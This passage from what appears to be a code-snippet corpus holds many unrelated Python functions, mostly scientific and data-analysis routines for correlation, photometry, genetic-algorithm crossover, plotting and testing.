probability:\n # Switch phenotypes of 2 classifiers if GA is run in match set\n temp = self.action\n self.action = cl.action\n cl.action = temp\n changed = True\n return changed\n #-------------------------------------------------------\n # CONTINUOUS PHENOTYPE CROSSOVER\n #-------------------------------------------------------\n elif random.random() < 0.5:\n return self.actionCrossover(cl)", "def prep_coco_cats():\n for coco_cat_id, transformed_cat_id_p1 in get_label_map().items():\n transformed_cat_id = transformed_cat_id_p1 - 1\n coco_cats[transformed_cat_id] = coco_cat_id\n coco_cats_inv[coco_cat_id] = transformed_cat_id", "def _cont_cat_corr_features_anova(self, p_val = 0.01, subsamplesize = 100, p_seed = 0):\n \"\"\" Use ICC to define correlations, give box-plots for highly correlated pairs \"\"\"\n # TODO add option to do Bonferroni correction to adjust p-value depending on number of variables\n \n warnings.filterwarnings('ignore')\n # List of pairs along with correlation above threshold\n cont_cat_corr_list = []\n \n seed(p_seed)\n rand_vals = sample(range(self._n_rows), k=subsamplesize)\n \n # Search for the highly correlated pairs\n for i in self._cont_index_predictors: \n for j in 
self._cat_index_predictors:\n formula = self._dataset.columns[i] + \" ~ \" + self._dataset.columns[j] \n model_fit = ols(formula, data=self._dataset.iloc[rand_vals,:]).fit()\n anova_model = anova_lm(model_fit)\n p = anova_model.iloc[0,4]\n if p < p_val:\n cont_cat_corr_list.append([p,i,j]) #store correlation and columns index\n \n # Order variables by level of correlation \n s_cont_cat_corr_list = sorted(cont_cat_corr_list,key=lambda x: abs(x[0]))\n \n cont_cat_corr_features = []\n\n for v,i,j in s_cont_cat_corr_list:\n cont_cat_corr_features.append([self._dataset.columns[i],self._dataset.columns[j],v])\n \n return cont_cat_corr_features", "def removePick(self):\n self.pnt = None\n vtkRenWin.delMarker(self.renWin)", "def localize_red_clump(star_catalog,close_cat_idx,log):\n\n def select_within_range(mags, colours, mag_min, mag_max, col_min, col_max):\n \"\"\"Function to identify the set of array indices with values\n between the range indicated\"\"\"\n\n idx1 = np.where(colours >= col_min)[0]\n idx2 = np.where(colours <= col_max)[0]\n idx3 = np.where(mags >= mag_min)[0]\n idx4 = np.where(mags <= mag_max)[0]\n idx = set(idx1).intersection(set(idx2))\n idx = idx.intersection(set(idx3))\n idx = list(idx.intersection(set(idx4)))\n\n return idx\n\n RC = photometry_classes.Star()\n\n inst_i = star_catalog['cal_ref_mag_ip'][close_cat_idx]\n inst_r = star_catalog['cal_ref_mag_rp'][close_cat_idx]\n inst_g = star_catalog['cal_ref_mag_gp'][close_cat_idx]\n cal_i = star_catalog['imag'][close_cat_idx]\n cal_r = star_catalog['rmag'][close_cat_idx]\n cal_g = star_catalog['gmag'][close_cat_idx]\n inst_ri = inst_r - inst_i # Catalogue column order is red -> blue\n inst_gi = inst_g - inst_i\n inst_gr = inst_g - inst_r\n cal_ri = cal_r - cal_i\n cal_gi = cal_g - cal_i\n cal_gr = cal_g - cal_r\n\n log.info('\\n')\n log.info('Localizing the Red Clump')\n log.info('Median (r-i), i: '+str(np.median(inst_ri))+', '+str(np.median(inst_i)))\n log.info('Median (g-i), i: '+str(np.median(inst_gi))+', '+str(np.median(inst_i)))\n log.info('Median (g-r), g: '+str(np.median(inst_gr))+', '+str(np.median(inst_g)))\n\n ri_min = 0.8\n ri_max = 1.2\n i_min = 15.5\n i_max = 16.5\n\n r_min = 16.2\n r_max = 17.5\n\n gi_min = 2.5\n gi_max = 3.5\n\n gr_min = 1.5\n gr_max = 2.2\n g_min = 17.8\n g_max = 19.5\n\n log.info('Selected Red Clump giants between:')\n log.info('i = '+str(i_min)+' to '+str(i_max))\n log.info('r = '+str(r_min)+' to '+str(r_max))\n log.info('(r-i) = '+str(ri_min)+' to '+str(ri_max))\n log.info('g = '+str(g_min)+' to '+str(g_max))\n log.info('(g-r) = '+str(gr_min)+' to '+str(gr_max))\n log.info('(g-i) = '+str(gi_min)+' to '+str(gi_max))\n\n idx = select_within_range(inst_i, inst_ri, i_min, i_max, ri_min, ri_max)\n\n (RC.ri, RC.sig_ri, RC.i, RC.sig_i) = calc_distribution_centroid_and_spread_2d(inst_ri[idx], inst_i[idx], use_iqr=True)\n\n idx = select_within_range(inst_r, inst_ri, r_min, r_max, ri_min, ri_max)\n\n (RC.r, RC.sig_r) = calc_distribution_centre_and_spread(inst_r[idx], use_iqr=True)\n\n idx = select_within_range(inst_g, inst_gr, g_min, g_max, gr_min, gr_max)\n\n (RC.gr, RC.sig_gr, RC.g, RC.sig_g) = calc_distribution_centroid_and_spread_2d(inst_gr[idx], inst_g[idx], use_iqr=True)\n\n idx = select_within_range(inst_g, inst_gi, g_min, g_max, gi_min, gi_max)\n\n (RC.gi, RC.sig_gi, RC.g, RC.sig_g) = calc_distribution_centroid_and_spread_2d(inst_gi[idx], inst_g[idx], use_iqr=True)\n\n log.info('\\n')\n log.info('Centroid of Red Clump Stars at:')\n log.info(RC.summary(show_mags=True))\n 
log.info(RC.summary(show_mags=False,show_colours=True))\n\n RC.transform_to_JohnsonCousins()\n\n log.info(RC.summary(show_mags=False,johnsons=True))\n\n return RC", "def reset_uncertainties(self):\n\n # Make a new temporary ExoParameter using the original self.template\n # dictionary and copy the uncertainty values.\n blank = ExoParameter(\"fake\", attr_dict=self.template)\n self.uncertainty = blank.uncertainty\n self.uncertainty_lower = blank.uncertainty_lower\n self.uncertainty_upper = blank.uncertainty_upper", "def isotropic_correction_back(self):\n return self.cartesian_map_array(self.IsotropicCorrection(self,'back'))", "def _correct_band(image, band_name, kvol, kvol0, f_iso, f_geo, f_vol):\n\t\t\tiso = ee.Image(f_iso)\n\t\t\tgeo = ee.Image(f_geo)\n\t\t\tvol = ee.Image(f_vol)\n\t\t\tpred = vol.multiply(kvol).add(geo.multiply(kvol)).add(iso).rename(['pred'])\n\t\t\tpred0 = vol.multiply(kvol0).add(geo.multiply(kvol0)).add(iso).rename(['pred0'])\n\t\t\tcfac = pred0.divide(pred).rename(['cfac'])\n\t\t\tcorr = image.select(band_name).multiply(cfac).rename([band_name])\n\t\t\treturn corr", "def corr(self):\n pass", "def preferred_rep(self):\n # reducing coefficients mod torsion\n if self.torsion != 'free':\n for key, value in self.items():\n self[key] = value % self.torsion\n\n # removing key:value pairs with value = 0\n zeros = [k for k, v in self.items() if not v]\n for key in zeros:\n del self[key]", "def fix_curvature(self) -> None:\n self.n1.fix = True\n self.n2.fix = True", "def testSetColorCorrectionTuple(self):\n self.node.color_corrections = tuple(self.color_corrections)\n\n # We need to convert self.color_corrections to a set then to a list\n # so the order matches\n self.assertEqual(\n list(set(self.color_corrections)),\n self.node.color_corrections\n )", "def _warn_meas_corr(self):\n corr_with = {}\n # iterate over all measurements constraining at least one fit obs.\n for name in self.get_measurements:\n m = flavio.classes.Measurement[name]\n # iterate over all fit obs. constrained by this measurement\n for obs in set(self.observables) & set(m.all_parameters):\n # the constraint on this fit obs.\n constraint = m._parameters[obs][1]\n # find all the other obs. constrained by this constraint\n for c, p in m._constraints:\n if c == constraint:\n par = p\n break\n for p in par:\n # if the other obs. are not fit obs., append them to the list\n if p not in self.observables:\n if p not in corr_with:\n corr_with[p] = [obs]\n else:\n corr_with[p].append(obs)\n # replace list by a Counter\n corr_with = {k: Counter(v) for k, v in corr_with.items() if v}\n # warn for all counts > 1\n for obs1, counter in corr_with.items():\n for obs2, count in counter.items():\n if count > 1:\n warnings.warn((\"{} of the measurements in the fit '{}' \"\n \"constrain both '{}' and '{}', but only the \"\n \"latter is included among the fit \"\n \"observables. 
This can lead to inconsistent \"\n \"results as the former is profiled over.\"\n ).format(count, self.name, obs1, obs2))\n return corr_with", "def testSetColorCorrectionSet(self):\n self.node.color_corrections = self.color_corrections\n\n # We need to convert self.color_corrections to a set then to a list\n # so the order matches\n self.assertEqual(\n list(set(self.color_corrections)),\n self.node.color_corrections\n )", "def isotropic_correction_front(self):\n return self.cartesian_map_array(self.IsotropicCorrection(self,'front'))", "def _fill_impropers_cross_maps(self) -> None:\n impropers, cross_maps = [], []\n for residue in self.residues:\n for improper in residue.impropers:\n impropers.append([self._id_to_index[x] for x in improper])\n for cross_map in residue.cross_maps:\n cross_maps.append([self._id_to_index[x] for x in cross_map])\n self.impropers, self.cross_maps = impropers, cross_maps", "def SetPRCatConstraint(self, model ) :\n tot = np.multiply(self.wish, self.dispo)\n for line in tot :\n for val in line :\n if not val : continue\n if self.bound>0 : model += val <= self.valBound\n elif self.bound<0 : model += val >= self.valBound", "def phenotypeCrossover(self, cl):\n changed = False\n if self.action[0] == cl.action[0] and self.action[1] == cl.action[1]:\n return changed\n else:\n tmp_key = random.random() < 0.5 #Make random choice between 4 scenarios, Swap minimums, Swap maximums, Children preserve parent phenotypes.\n if tmp_key: #Swap minimum\n temp = self.action[0]\n self.action[0] = cl.action[0]\n cl.action[0] = temp\n changed = True\n elif tmp_key: #Swap maximum\n temp = self.action[1]\n self.action[1] = cl.action[1]\n cl.action[1] = temp\n changed = True\n\n return changed", "def prune(self, threshold=0, with_multiplicity=False):\n coefs = self.eci if with_multiplicity else self.coefs\n bit_ids = [i for i, coef in enumerate(coefs) if abs(coef) < threshold]\n self.cluster_subspace.remove_corr_functions(bit_ids)\n\n # Update necessary attributes\n ids_complement = list(set(range(len(self.coefs))) - set(bit_ids))\n ids_complement.sort()\n self.coefs = self.coefs[ids_complement]\n\n if self._feat_matrix is not None:\n self._feat_matrix = self._feat_matrix[:, ids_complement]\n\n if hasattr(self, \"eci\"): # reset cache\n del self.eci\n\n if hasattr(self, \"cluster_interaction_tensors\"): # reset cache\n del self.cluster_interaction_tensors\n\n # reset the evaluator\n self._set_evaluator_data(set_orbits=True)", "def pick_up(self):", "def multi_precisions_correlate2(self):\n self.query_dict={'code':code2.value,'exchange':exchange2.value,\\\n 'structure':struct2.value,'element':element2.value,'properties':prop2.value}\n print ('POSTING', self.query_dict)\n if not self.query_dict['properties'] == 'Multi':\n self.query_api(endpoint='precvalue')\n self.prop_data = self.plot_data['s{}k'.format(self.properties)]\n self.energy_data = self.plot_data['sE0k'.format(self.properties)]\n layout_doc.children[4].children[1] = self.plot_precision_figure()", "def corr_val(df,figsize=(15,15),cmap=\"OrRd\",):\n\n # Calculate correlations\n corr = df.corr()\n \n # Create a mask of the same size as our correlation data\n mask = np.zeros_like(corr)\n \n # Set the upper values of the numpy array to \"True\" to ignore them\n mask[np.triu_indices_from(mask)] = True\n\n fig, ax = plt.subplots(figsize=figsize)\n \n # Mask=mask to hide the upper-right half of values (otherwise mirrored)\n sns.heatmap(corr, annot=True,cmap=\"Reds\",mask=mask)\n return fig, ax", "def _set_correlation_strength(self):\n\n if 
hasattr(self, 'correlation_strength_abcissa'):\n abcissa = self.correlation_strength_abcissa\n ordinates = [self.param_dict['correlation_param'+str(i+1)] for i in range(len(abcissa))]\n correlation_strength_spline = model_helpers.custom_spline(abcissa, ordinates, k=custom_len(abcissa)-1)\n self.correlation_strength = correlation_strength_spline(self.prim_galprop_bins)\n else:\n self.correlation_strength = np.repeat(self.param_dict['correlation_param1'], len(self.prim_galprop_bins))\n\n self.correlation_strength[self.correlation_strength > 1] = 1\n self.correlation_strength[self.correlation_strength <- 1] = -1\n\n self.correlation_strength = np.append(\n self.correlation_strength, self.correlation_strength[-1])", "def test_clone_retains_settings(self):\n\n class Number(Document):\n n = IntField()\n\n Number.drop_collection()\n\n qs = Number.objects\n qs_clone = qs.clone()\n assert qs._read_preference == qs_clone._read_preference\n assert qs._read_concern == qs_clone._read_concern\n\n qs = Number.objects.read_preference(ReadPreference.PRIMARY_PREFERRED)\n qs_clone = qs.clone()\n assert qs._read_preference == ReadPreference.PRIMARY_PREFERRED\n assert qs._read_preference == qs_clone._read_preference\n\n qs = Number.objects.read_concern({\"level\": \"majority\"})\n qs_clone = qs.clone()\n assert qs._read_concern.document == {\"level\": \"majority\"}\n assert qs._read_concern == qs_clone._read_concern\n\n Number.drop_collection()", "def old_recombine(self, parents):\n p1,p2 = parents[0].copy(), parents[1].copy()\n if random.random() < self.recombination_chance:\n # i'll cut a section that will be correspond to half of the gene\n # or lower. least being a fourth of the genetic information...\n to_cut = random.choice(range(int(len(p1)/4), int(len(p1)/2)+1))\n # insert recombination chance here, 90% as seen in class.\n p1[:to_cut],p2[:to_cut] = p2[:to_cut],p1[:to_cut]\n\n return [p1,p2]", "def test_remove_autos():\n test_array = np.ones((3, 3, 11, 21))\n out_array = utils.remove_auto_correlations(test_array, axes=(0, 1))\n assert (6, 11, 21) == out_array.shape", "def purify_selection(self, ch1_ch2_color_cut):\n\n # Read in the number count distribution file\n with open(self._field_number_dist, 'r') as f:\n field_number_distribution = json.load(f)\n field_number_counts = field_number_distribution['normalized_number_counts']\n color_bins = field_number_distribution['color_bins']\n color_bin_min, color_bin_max = np.min(color_bins), np.max(color_bins)\n\n # Create an interpolation of our number count distribution\n color_probability_distribution = interp1d(color_bins, field_number_counts)\n\n clusters_to_remove = []\n for cluster_id, cluster_info in self._catalog_dictionary.items():\n # Get the photometric catalog for the cluster\n se_catalog = cluster_info['catalog']\n\n # Compute the color and color errors for each object\n I1_I2_color = se_catalog['I1_MAG_APER4'] - se_catalog['I2_MAG_APER4']\n I1_I2_color_err = np.sqrt((2.5 * se_catalog['I1_FLUXERR_APER4'] /\n (se_catalog['I1_FLUX_APER4'] * np.log(10))) ** 2 +\n (2.5 * se_catalog['I2_FLUXERR_APER4'] /\n (se_catalog['I2_FLUX_APER4'] * np.log(10))) ** 2)\n\n # Convolve the error distribution for each object with the overall number count distribution\n def object_integrand(x):\n return norm(loc=I1_I2_color, scale=I1_I2_color_err).pdf(x) * color_probability_distribution(x)\n\n # Compute the probability contained within the selection region by each object's color error\n # def degree_of_membership(color, color_err):\n # color_prob_in_numer = quad(\n # 
lambda x: norm(loc=color, scale=color_err).pdf(x) * color_probability_distribution(x),\n # a=ch1_ch2_color_cut, b=color_bin_max)[0]\n # color_prob_in_denom = quad(\n # lambda x: norm(loc=color, scale=color_err).pdf(x) * color_probability_distribution(x),\n # a=color_bin_min, b=color_bin_max, args=(color, color_err))[0]\n # return color_prob_in_numer / color_prob_in_denom\n #\n # with MultiPool() as pool:\n # color_prob_in = pool.map(degree_of_membership, zip(I1_I2_color, I1_I2_color_err))\n color_prob_in_numer = quad_vec(object_integrand, a=ch1_ch2_color_cut, b=color_bin_max)[0]\n color_prob_in_denom = quad_vec(object_integrand, a=color_bin_min, b=color_bin_max)[0]\n color_prob_in = color_prob_in_numer / color_prob_in_denom\n\n # Store the degree of membership into the catalog\n se_catalog['SELECTION_MEMBERSHIP'] = color_prob_in\n\n # As objects with degrees of membership of 0 do not contribute to the sample, we can safely remove them.\n se_catalog = se_catalog[se_catalog['SELECTION_MEMBERSHIP'] > 0]\n\n # def new_color_prob(x, color, color_err, denom_idx):\n # return -1. * norm(loc=color, scale=color_err).pdf(x) * color_probability_distribution(x) / \\\n # color_prob_in_denom[denom_idx]\n\n # # Maximize the probability distribution\n # new_color = [minimize_scalar(new_color_prob, args=(color, color_err, denom_idx),\n # bounds=(np.min(color_bins), np.max(color_bins)), method='bounded').x\n # for denom_idx, (color, color_err) in enumerate(zip(I1_I2_color, I1_I2_color_err))]\n #\n # # Store the new color in the catalog\n # se_catalog['CORRECTED_COLOR'] = new_color\n #\n # # Select only objects that have a (new) color redder than our threshold\n # se_catalog = se_catalog[se_catalog['CORRECTED_COLOR'] >= ch1_ch2_color_cut]\n\n # If we have exhausted all objects from the catalog mark the cluster for removal otherwise update the\n # photometric catalog in our database\n if se_catalog:\n cluster_info['catalog'] = se_catalog\n else:\n clusters_to_remove.append(cluster_id)\n\n # Remove any cluster that has no objects surviving our selection cuts\n for cluster_id in clusters_to_remove:\n self._catalog_dictionary.pop(cluster_id, None)", "def pairwise_correlation_difference(self):\r\n\r\n real_cat, synth_cat = self.to_cat(self.origdst, self.synthdst)\r\n\r\n real_cat_dem = self.get_demographics(real_cat)\r\n synth_cat_dem = self.get_demographics(synth_cat)\r\n\r\n corr_real_obj = associations(real_cat_dem, theil_u=True, bias_correction=False, plot=False)\r\n corr_synth_obj = associations(synth_cat_dem, theil_u=True, bias_correction=False, plot=False)\r\n\r\n corr_real = corr_real_obj['corr']\r\n corr_rand = corr_synth_obj['corr']\r\n\r\n substract_m = np.subtract(corr_real, corr_rand)\r\n prwcrdst = LA.norm(substract_m)\r\n\r\n return prwcrdst, substract_m", "def correlationZernike():\n Tfile='/home/jghao/research/decamFocus/psf_withseeing/finerGrid_coeff_matrix/zernike_coeff_finerGrid_training.cp'\n b=p.load(open(Tfile))\n x = b[:,0]\n y = b[:,1]\n z = b[:,2]\n theta = b[:,3]\n phi = b[:,4]\n fwhm = b[:,5]\n e1 = b[:,6]\n e2 = b[:,7]\n thetax = theta*np.cos(np.deg2rad(phi))\n thetay = theta*np.sin(np.deg2rad(phi))\n bb = b[:,7:68] #choose only those corresponding to M202\n #idx = np.concatenate((np.arange(9,28),np.arange(29,48),np.arange(49,68)))\n #bb = b[:,idx]\n evalue,evector,pca = getPCA(bb)\n coeff = np.corrcoef(bb.T)\n ok = coeff >= 0.65\n pl.matshow(coeff*ok)\n ind = np.arange(0,60)\n 
pl.xticks(ind,('Piston','Tip','Tilt','Astigmatism','Defocus','Astigmatism','Trefoil','Coma','Coma','Trefoil','Ashtray','Astigm.5th','Spherical','Astigm.5th','Ashtray','16','17','18','19','20','Piston','Tip','Tilt','Astigmatism','Defocus','Astigmatism','Trefoil','Coma','Coma','Trefoil','Ashtray','Astigm.5th','Spherical','Astigm.5th','Ashtray','16','17','18','19','20','Piston','Tip','Tilt','Astigmatism','Defocus','Astigmatism','Trefoil','Coma','Coma','Trefoil','Ashtray','Astigm.5th','Spherical','Astigm.5th','Ashtray','16','17','18','19','20'),rotation=90,color='black')\n pl.yticks(ind,('Piston','Tip','Tilt','Astigmatism','Defocus','Astigmatism','Trefoil','Coma','Coma','Trefoil','Ashtray','Astigm.5th','Spherical','Astigm.5th','Ashtray','16','17','18','19','20','Piston','Tip','Tilt','Astigmatism','Defocus','Astigmatism','Trefoil','Coma','Coma','Trefoil','Ashtray','Astigm.5th','Spherical','Astigm.5th','Ashtray','16','17','18','19','20','Piston','Tip','Tilt','Astigmatism','Defocus','Astigmatism','Trefoil','Coma','Coma','Trefoil','Ashtray','Astigm.5th','Spherical','Astigm.5th','Ashtray','16','17','18','19','20'))\n pl.grid(color='yellow')", "def add_over(self: CorridorGroup, override: CorridorGroup) -> None:\n for key, corr_over in override.corridors.items():\n try:\n corr_base = self.corridors[key]\n except KeyError:\n self.corridors[key] = corr_over\n else:\n corr_base.extend(corr_over)", "def plot_multiple_correlations(df: pd.DataFrame, col1: str, col2: str, col_category: str, min_corr: float,\n plot_width: int = 500, plot_height: int = 400, jitter_scale: float = 0.4,\n circle_colours: list = ['#ffd54f', '#7986cb', '#4db6ac', '#f06292'],\n line_colours: list = ['#ffb300', '#3f51b5', '#00897b', '#d81b60']):\n legend_it = []\n\n p = figure(title='Correlation between {} and {} by {}'.format(col1, col2, col_category), plot_width=plot_width,\n plot_height=plot_height, tools=[\"save\"])\n\n correlations = []\n\n for ind, cat in enumerate(df[col_category].dropna().unique()):\n df_for_col = df[df[col_category] == cat].dropna()\n\n correlations.append(df_for_col[col1].corr(df_for_col[col2]))\n\n if any(corr >= min_corr for corr in correlations):\n\n for ind, cat in enumerate(df[col_category].dropna().unique()):\n df_for_col = df[df[col_category] == cat].dropna()\n source = ColumnDataSource(df_for_col)\n c = p.circle(x=jitter(col1, width=jitter_scale, range=p.x_range, distribution='normal'), y=col2,\n color=circle_colours[ind], alpha=1 - (ind * 0.5 ** ind), source=source)\n\n legend_it.append(('{} (r = {})'.format(cat, round(correlations[ind], 2)), [c]))\n\n for ind, cat in enumerate(df[col_category].dropna().unique()):\n df_for_col = df[df[col_category] == cat].dropna()\n par = np.polyfit(df_for_col[col1], df_for_col[col2], 1, full=True)\n slope = par[0][0]\n intercept = par[0][1]\n y_predicted = [slope * i + intercept for i in df_for_col[col1]]\n\n df_for_col['y_predicted'] = y_predicted\n\n source = ColumnDataSource(df_for_col)\n\n p.line(x=col1, y='y_predicted', color=line_colours[ind], alpha=0.8, line_width=2, source=source)\n\n p.title.text_font = p.xaxis.axis_label_text_font = p.yaxis.axis_label_text_font = \"Helvetica Neue\"\n p.xgrid.visible = p.ygrid.visible = False\n\n p.xaxis.axis_label = col1\n p.yaxis.axis_label = col2\n\n legend = Legend(items=legend_it, location=(0, 0))\n p.add_layout(legend, 'below')\n\n return p, True\n\n else:\n return -1, False", "def remove_random_rule(self):\n\n\t\ta = self.get_random_cell()\n\t\ta.remove_ProductRule(a.get_random_rule())", "def base_corr(self, cutoff=0.3, show=0):\n\tn = 
self.data_points\n\tlast_points = int(cutoff*n)\n\tfor i in range(2):\n\t self.the_result.y[i] = self.the_result.y[i] - self.the_result.y[i][:-last_points].mean()\n\tif show == 1 :\n\t return self.the_result\n\treturn self", "def compParDiff(self, chem) :\r\n import warnings\r\n warnings.warn('Partition and diffusion coefficients in homogenised stratum corneum are NOT calculated. '\r\n 'Only user-supplied values are used.')", "def testSetColorCorrectionList(self):\n self.node.color_corrections = self.color_corrections\n\n # We need to convert self.color_corrections to a set then to a list\n # so the order matches\n self.assertEqual(\n list(set(self.color_corrections)),\n self.node.color_corrections\n )", "def elimination_ofconc(a2_data):\n for data in a2_data.values():\n data.pop('conc')\n return a2_data", "def check_contrast_values(self, contrast = 'stim', normalized = False, save = False):\n\t\n\t\t# check each patch separately across runs \n\t\tcomparisons = [(0,1),(0,2),(0,3),(1,2),(1,3),(2,3)]\n\t\tfor i in range(12):\n\t\t\tif contrast == 'stim':\n\t\t\t\tdd = self.ROI_data_all['V1']['stim_con%i'%(i+1)].reshape((4, self.ROI_data_all['V1']['stim_con%i'%(i+1)].shape[0]/4)) \t\n\t\t\telif contrast == 'base':\n\t\t\t\tdd = self.ROI_data_all['V1']['base_con%i'%(i+1)].reshape((4, self.ROI_data_all['V1']['base_con%i'%(i+1)].shape[0]/4))\n\t\t\tcounter = 0\t\n\t\t\tfor c in comparisons:\t\n\t\t\t\tax = plt.subplot(12,6,((i*6) + counter))\n\t\t\t\tax.scatter(dd[c[0]],dd[c[1]],label = str(round(pearsonr(dd[c[0]],dd[c[1]])[0],2)))\n\t\t\t\tax.legend(loc = 0)\n\t\t\t\tax.set_title(str(c[0]) + '-' + str(c[1]))\n\t\t\t\tcounter += 1\t\t\t\t\n\t\tif save == True:\n\t\t\tplt.savefig(os.path.join(self.stageFolder(stage = 'processed/mri/figs'), self.contrast_type))\n\t\t\n\n\t\t# check correlations across patches \n\t\tcoef_matrix = []\n\t\tfig, axes = plt.subplots(2,2)\n\t\tfor run in range(4):\t\n\t\n\t\t\tcor_matrix = []\n\t\t\tax = axes.flat[run]\n\n\t\t\tfor patch in range(12):\n\t\t\t\tif contrast == 'stim':\n\t\t\t\t\tcor_matrix.append(self.ROI_data_all['V1']['stim_con%i'%(patch+1)].reshape((4, self.ROI_data_all['V1']['stim_con%i'%(patch+1)].shape[0]/4))[run])\n\t\t\t\telif contrast == 'base':\n\t\t\t\t\tcor_matrix.append(self.ROI_data_all['V1']['base_con%i'%(patch+1)].reshape((4, self.ROI_data_all['V1']['base_con%i'%(patch+1)].shape[0]/4))[run])\t\n\t\t\t\n\t\t\tif normalized == False:\t\t\t\n\t\t\t\tim = ax.imshow(np.corrcoef(cor_matrix), interpolation = 'nearest', vmin = -1, vmax = 1)\n\t\t\t\tax.set_title(\"run \" + str(run + 1))\n\n\t\t\telse:\n\t\t\t\t# zscore per voxel across patches\n\t\t\t\tcor_matrix = np.array(cor_matrix)\n\t\t\t\tvoxel_to_remove = [i for i in range(cor_matrix.shape[1]) if np.sum(np.where(cor_matrix[:,i] == 0)) > 0] # voxels that contain a value of 0 for one of the patches\n\t\t\t\tcor_matrix = np.delete(cor_matrix,voxel_to_remove,axis = 1)\n\t\t\t\tcor_matrix = (cor_matrix- cor_matrix.mean(axis = 0))/cor_matrix.std(axis=0) \n\t\t\t\tim = ax.imshow(np.corrcoef(cor_matrix), interpolation = 'nearest', vmin = -1, vmax = 1)\n\t\t\t\tax.set_title(\"run \" + str(run + 1))\n\n\t\t\t# store output of all runs\n\t\t\tcoef_matrix.append(np.corrcoef(cor_matrix))\n\n\t\t# finish figure with color_bar\n\t\tfig.subplots_adjust(right=0.8)\n\t\tcbar_ax = fig.add_axes([0.85, 0.05, 0.05, 0.87])\n\t\tfig.colorbar(im, cax=cbar_ax)\n\t\t\n\t\t# save figures (4 subbplots) \n\t\tif normalized == False:\n\t\t\tif save == True:\n\t\t\t\tplt.savefig(os.path.join(self.stageFolder(stage = 
'processed/mri/figs'), 'corr_' + contrast + \"_\" + self.contrast_type))\n\t\telse:\n\t\t\tif save == True:\n\t\t\t\tplt.savefig(os.path.join(self.stageFolder(stage = 'processed/mri/figs'), 'corr_nor_' + contrast + \"_\" + self.contrast_type))\n\n\t\t\n\t\t# check correlations across patches for all runs combined (gfeat)\n\t\tcor_matrix_comb = []\n\t\tplt.figure()\n\t\tfor patch in range(12):\n\t\t\tif contrast == 'stim':\n\t\t\t\tcor_matrix_comb.append(self.ROI_data_all['V1']['stim_con_comb%i'%(patch+1)])\n\t\t\telif contrast == 'base':\n\t\t\t\tcor_matrix_comb.append(self.ROI_data_all['V1']['base_con_comb%i'%(patch+1)])\n\n\t\tif normalized == False:\t\n\t\t\tplt.imshow(np.corrcoef(cor_matrix_comb), interpolation = 'nearest', vmin = -1, vmax = 1)\n\t\t\tplt.title(\"combined\")\n\t\t\tplt.colorbar(ticks = [-1,0,1])\n\t\telse:\t\n\t\t\tcor_matrix_comb = np.array(cor_matrix_comb)\n\t\t\tvoxel_to_remove = [i for i in range(cor_matrix_comb.shape[1]) if np.sum(np.where(cor_matrix_comb[:,i] == 0)) > 0]\n\t\t\tcor_matrix_comb = np.delete(cor_matrix_comb,voxel_to_remove,axis = 1)\n\t\t\tcor_matrix_comb = (cor_matrix_comb- cor_matrix_comb.mean(axis = 0))/cor_matrix_comb.std(axis=0)\n\t\t\tplt.imshow(np.corrcoef(cor_matrix_comb), interpolation = 'nearest', vmin = -1, vmax = 1)\n\t\t\tplt.title('combined') \n\t\t\tplt.colorbar(ticks = [-1,0,1])\n\n\t\tif save == True:\n\t\t\tif normalized == False:\n\t\t\t\tplt.savefig(os.path.join(self.stageFolder(stage = 'processed/mri/figs'), 'corr_comb_' + contrast + \"_\" + self.contrast_type))\n\t\t\telse:\n\t\t\t\tplt.savefig(os.path.join(self.stageFolder(stage = 'processed/mri/figs'), 'corr_comb_nor_' + contrast + \"_\" + self.contrast_type))\n\t\telse:\n\t\t\treturn coef_matrix, np.corrcoef(cor_matrix_comb)", "def tie_correction(sx):\r\n ux = unique(sx)\r\n uxl = searchsorted(sx, ux, 'left')\r\n uxr = searchsorted(sx, ux, 'right')\r\n return 1. 
- _corr_kw(uxr - uxl).sum() / float(_corr_kw(len(sx)))", "def SetPRBinCatConstraint( self, model ) :\n tot = np.dot( self.wish.T, self.dispo )\n for val in tot :\n if not val : continue\n if self.bound>0 : model += val <= self.valBound\n elif self.bound<0 : model += val >= self.valBound", "def set_crossrefs(self, refs):\n try_match = self.get_interaction()\n for interaction in list(refs.keys()):\n # find associated interaction\n if try_match == interaction:\n try_match.set_crossrefs(refs.pop(interaction))\n break\n # send what's left to the economics\n self._economics.set_crossrefs(refs)\n # if anything left, there's an issue\n assert not refs", "def neutralise(self):\n m = self.m\n\n # Regenerates computed properties like implicit\n # valence and ring information.\n m.UpdatePropertyCache(strict=False)\n numHs = []; tvs = []\n for ai in m.GetAtoms():\n numHs.append( ai.GetNumExplicitHs() + ai.GetNumImplicitHs() )\n tvs.append( ai.GetTotalValence() )\n\n self.get_charged_pairs()\n\n for i in range(self.na):\n ai = m.GetAtomWithIdx(i)\n ci = self.charges[i]\n if ci != 0:\n if i not in self.cpairs.ravel():\n msg = ' zi = %d, tvi = %d, ci = %d, neib = %d'%(self.zs[i], tvs[i], ci, cnsDic[zs[i]])\n assert tvs[i] - ci == cnsDic[zs[i]], msg\n if numHs[i] == 0 and ci > 0:\n # in the case of >[N+]<, i.e., N with CoordNum = 4\n # we don't have to do anything\n continue\n ai.SetFormalCharge( 0 )\n ai.SetNoImplicit(True)\n ai.SetNumExplicitHs( numHs[i]-ci )\n print('i, zi, ci, nH = ', self.zs[i], ci, numHs[i])\n self.m = m", "def multi_precisions_correlate1(self):\n self.query_dict={'code':code.value,'exchange':exchange.value,\\\n 'structure':struct.value,'element':element.value,'properties':prop.value}\n print ('POSTING', self.query_dict)\n if not self.query_dict['properties'] == 'Multi':\n self.query_api(endpoint='precvalue')\n self.prop_data = self.plot_data['s{}k'.format(self.properties)]\n self.energy_data = self.plot_data['sE0k'.format(self.properties)]\n\n layout_doc.children[4].children[0] = self.plot_precision_figure()\n pass", "def resetCoronalSegment(self):\r\n #research\r\n profprint()\r\n sGreen = slicer.mrmlScene.GetNodeByID(\"vtkMRMLSliceNodeGreen\")\r\n if sGreen == None :\r\n sGreen = slicer.mrmlScene.GetNodeByID(\"vtkMRMLSliceNode3\")\r\n reformatLogic = slicer.vtkSlicerReformatLogic()\r\n #sGreen.SetSliceVisible(0)\r\n sGreen.SetOrientationToCoronal()\r\n #sw = slicer.app.layoutManager().sliceWidget(\"Green\")\r\n #sw.fitSliceToBackground()\r\n sGreen.Modified()", "def correlation_map(self,property_list):\n\t\tself.property_existence(property_list)\n\n\t\tfig, ax = plt.subplots()\n\t\tcorr = self.df[property_list].corr()\n\t\tsns.heatmap(corr, mask=np.zeros_like(corr, dtype=np.bool), cmap=sns.diverging_palette(220, 10, \n\t\t\tas_cmap=True), annot=True, ax=ax)\n\t\tfig.tight_layout()\n\t\tplt.show()", "def alt_clueset(self):\n sames = self.get_same_mapping()\n 